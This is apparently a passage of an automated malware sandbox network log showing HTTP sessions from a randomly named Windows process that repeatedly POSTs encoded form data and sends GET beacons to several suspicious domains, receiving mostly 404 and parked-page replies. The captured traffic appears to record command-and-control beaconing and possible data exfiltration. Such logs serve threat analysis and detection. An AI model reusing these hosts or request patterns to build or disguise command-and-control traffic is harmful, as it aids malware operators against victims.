                                              Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                              Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
Sep 25, 2024 12:46:54.950196981 CEST | 890 | IN | Data Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                              Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 172.96.187.60 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:47:00.253182888 CEST | 763 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 71 4f 75 47 63 6e 53 55 2b 42 62 64 32 68 31 4f 58 4f 4d 55 65 49 43 33 52 69 38 6c 38 75 53 52 34 41 45 39 45 44 5a 54 63 77 4e 42 53 50 70 61 6c 7a 54 59 70 6c 41 7a 4c 4d 38 2f 32 7a 4e 75 67 45 66 78 58 68 41 55 34 4e 79 4e 49 70 35 58 77 6a 4e 6e 6c 59 7a 59 37 2f 58 6b 50 42 76 79 2f 69 63 4d 6b 54 6c 71 64 57 77 76 4c 6a 6f 41 71 56 34 59 51 4c 44 48 57 6b 4e 4c 2b 6b 52 52 51 4d 4b 35 77 73 34 6b 61 4b 6b 48 75 54 41 49 39 79 6c 6e 54 51 5a 2f 6a 52 66 6a 52 6d 53 72 55 39 41 56 73 6b 43 36 45 63 30 39 73 55 6c 69 7a 46 36 45 32 41 3d 3d
                                              Data Ascii: PR_xXrA=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTQZ/jRfjRmSrU9AVskC6Ec09sUlizF6E2A==
                                              Sep 25, 2024 12:47:00.696494102 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:00 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 49743 | 172.96.187.60 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:02.794791937 CEST | 783 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcQOxTsW+GHNtKqWRrRWXKIJKqbuAURbVlY=
                                              Sep 25, 2024 12:47:03.239924908 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:03 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 49744 | 172.96.187.60 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:05.344904900 CEST | 10865 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:05.797883034 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:05 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.4 | 49745 | 172.96.187.60 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:07.887039900 CEST | 507 | OUT | GET /v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dalong.site
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:08.337837934 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:08 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:13.400037050 CEST | 790 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE85nQPgNnt80BdHStceVeyTBR1xeDWQYo5A==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:15.956368923 CEST | 810 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTlio2X3bTlhiNwSjX1rum92cSYSI/WfuJ0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:18.498404026 CEST | 10892 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3keLwVgZL2XFBbYJksU86zcK6V9sAt0MsNdqSnIbs20C77mFkcXA/0I+lWXkkxdNgQJCWVnN4bEw+dxIfoT4BOFM/6fFjBPb9vPHw8vKL8zwUK3fc4iahbNp88qCnFHlkw9UMRnO6ZPgp0A5Q63zTDzttuv8Xt3ZO51F5TjxOM6Wb4OsFXqvZQ6Zx1aT+y8N3FtJFqhSUlgyQiDKuVaincpB4UEtDLhPxD+IhFo0izvlCL7RadAB7IL5JGFWI7dXJjoc08cbWDLTAAvq4ikiXtuLBTC2KedUmRicWtFz8gbeidxyyOQQS4vyhMEhVdJQlc46YdKBSMc3ea3rxhHaZ70UYUDeYDagCy7Lf7nMaz0kpp+my+BsQygnAXSEXyievW/FwtkaVGmIfx1iET16UTMyhELTK5C4tv0OL+QjkEx4JqCj7N9qO00SKjPbAw0KhLkB5lOfPEv7Hmp1w/PLp+8/JLgEwKv2P8LG45zG2x1kI6e795ivoFKYHLUe6670ZjdUJwwf6SrTc4ElB2U4ICuG+oFLE0WLk5lcOo01/xFiZLqduXf+y88cCE/YVQMdCtY+2mVrJ1oGdEYwnG7+S0wpix3Zw99kU6tSVGNH3ubcYLQGaThLh/1QcNezdRSclH5z4IGYZ19gDF5ewZtqMcrBRlBWz9NVH3SXcmYxA/dM7GO0LNUTWbSPfSdU4frEIZJN1xmDfX73hwPXZfdi3yVhdMhqi9i7ACvjHlqYfNzmxvM+PhRh4pJsUKWMGtFbajBs+Zb0u+BJUoQWOYK4w5Us337UA3s62CQRDtDPWP6q7ULOiRh4wsDe3NYmp6/QarwJowHaWcGF+qPw0xUxMrA+5oraMJNeR3ochnkSCUjjagwSCWkt0yRs5RGzMzk0KU+0TkEZWJNiSsqtw21rx2ccEg3D3AiZ4UTFBsR1RZuF5Ou/gyqMem8ht6m8rvBwdsJXB [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:21.065594912 CEST | 516 | OUT | GET /xamn/?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mgeducacaopro.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:21.516455889 CEST | 401 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:47:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.4 | 49750 | 67.223.117.189 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:47:26.743124962 CEST | 766 | OUT | POST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtaduDhsQS1gcR4Tv1BwULgB7kBSOfM/ZlNvQ==
                                              Sep 25, 2024 12:47:27.411669016 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:27 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 25, 2024 12:47:27.411685944 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 25, 2024 12:47:27.411695957 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 25, 2024 12:47:27.411706924 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                              Sep 25, 2024 12:47:27.411719084 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                              Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                              Sep 25, 2024 12:47:27.411729097 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f
                                              Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a
                                              Sep 25, 2024 12:47:27.411741018 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74
                                              Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1
                                              Sep 25, 2024 12:47:27.411752939 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a>
                                              Sep 25, 2024 12:47:27.411763906 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 6c 69 67
                                              Data Ascii: <li><a class="dropdown-item" href="header4-light.html">Header 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark<
                                              Sep 25, 2024 12:47:27.411773920 CEST556INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65
                                              Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Footers</a> <ul class="dropdown-menu"> <li><a class="
                                              Sep 25, 2024 12:47:27.411787033 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 46 6f 6f 74 65 72 31 2d 6c 69 67 68 74 2e 68 74 6d 6c
                                              Data Ascii: <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-dark.html">Footer 1 Dark</a></li


Session ID: 14
Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 67.223.117.189 | Destination Port: 80 | PID: 3368
Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe

